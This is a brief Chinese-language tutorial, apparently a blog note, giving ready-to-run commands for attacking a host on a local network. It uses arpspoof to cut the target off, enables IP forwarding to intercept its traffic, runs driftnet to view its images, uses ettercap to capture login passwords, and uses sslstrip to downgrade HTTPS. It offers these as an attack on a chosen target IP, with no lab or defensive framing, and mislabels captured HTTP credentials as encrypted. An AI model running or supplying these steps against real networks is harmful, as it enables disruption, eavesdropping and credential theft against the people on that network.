一、直接实现局域网某ip断网
arpspoof -i eth0 -t 192.168.183.14 192.168.183.1
其中192.168.183.14为要攻击的ip地址,192.168.183.1为默认网关地址,eth0为自己的网卡,其实就是相当于让流经192.168.183.14的流量经过自己的网卡(本质是arp欺骗)
arpspoof -i 网卡 -t 目标ip 网关
其实就是通过arp欺骗
目标IP的流量经过我的网卡,但是并没有流量转发,所以目标ip就会出现断网现象
但是我们也是可以通过这种方式将流量转发出去,那么我就可以浏览他的流量,同时特也是能够正常上网
二、开启流量转发
在上面的基础上如果我们进行流量转发,那么就可以让目标ip通过我们电脑进行上网,而我们则可以实时获取目标ip的流量
echo 1 >/proc/sys/net/ipv4/ip_forward(开启ip流量转发)
流量->我的网卡->网关->目标ip机子
上述命令就可以实现流量转发,这样目标ip就不会出现断网现象
driftnet -i eth0
driftnet ->获取本机网卡的图片
上述指令可以直接显示我们捕获的流量信息
三、用户密码捕获
ettercap -Tq -i eth0
-Tq ->启动文本编辑模式,q安静模式
之后就可以获取目标主机登录时的账号密码信息(http加密的)
当出现中文编码时,可以尝试url解码进行显示
三、 https账户密码截取
编辑下面文件的内容,将下面两行内容取消注释,不同版本的kali操作系统可能有略微差别,自己进行斟酌即可,其实就是实现将https的连接转换成http形式的
sslstrip ->https连接还原成http连接形式进行进行截取
sslstrip -a -f -k即可,但是容易使得浏览器的证书失效,并不一定会成功抓取到信息